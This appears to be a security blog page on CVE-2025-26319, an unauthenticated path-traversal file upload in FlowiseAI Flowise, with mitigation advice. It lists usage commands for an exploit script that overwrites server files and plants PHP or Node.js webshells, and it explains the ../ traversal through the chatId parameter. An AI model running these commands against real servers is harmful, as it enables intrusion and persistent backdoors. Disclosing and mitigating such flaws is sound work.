CVE-2025-26319 is a critical vulnerability affecting FlowiseAI Flowise versions up to and including 2.2.6.
This vulnerability allows attackers to perform arbitrary file uploads, potentially leading to remote code execution, server compromise, and unauthorized access to sensitive data.
/api/v1/attachments endpoint, which lacks proper validation of user-supplied parameters.flowise_exploit.pypython flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txtpython flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.jsonpython flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.phppython flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.jsThe attack exploits the /api/v1/attachments route, which is accessible without authentication. By manipulating the chatId parameter, attackers can perform path traversal (../../../) to upload arbitrary files to any location on the server’s file system.
To mitigate this vulnerability, users should upgrade FlowiseAI Flowise to version 2.2.7 or later.
Additional measures include restricting file uploads, implementing strict file type and size filtering, using allowlists for permitted file extensions, and configuring web application firewall (WAF) rules.
Apache is one of the most widely used open-source web servers in the world. It is…
Swap space is an area on disk that Linux uses when it runs out of physical…
Zoom is one of the most widely used video conferencing platforms. Zoom works on Windows, macOS,…
Webmin is an open-source web-based control panel for Linux servers. It gives you a browser interface…
MariaDB is an open-source relational database management system. It was created by the original MySQL developers…
Corruption investigations need accuracy, patience, and strong evidence. In 2026, OSINT tools can help researchers,…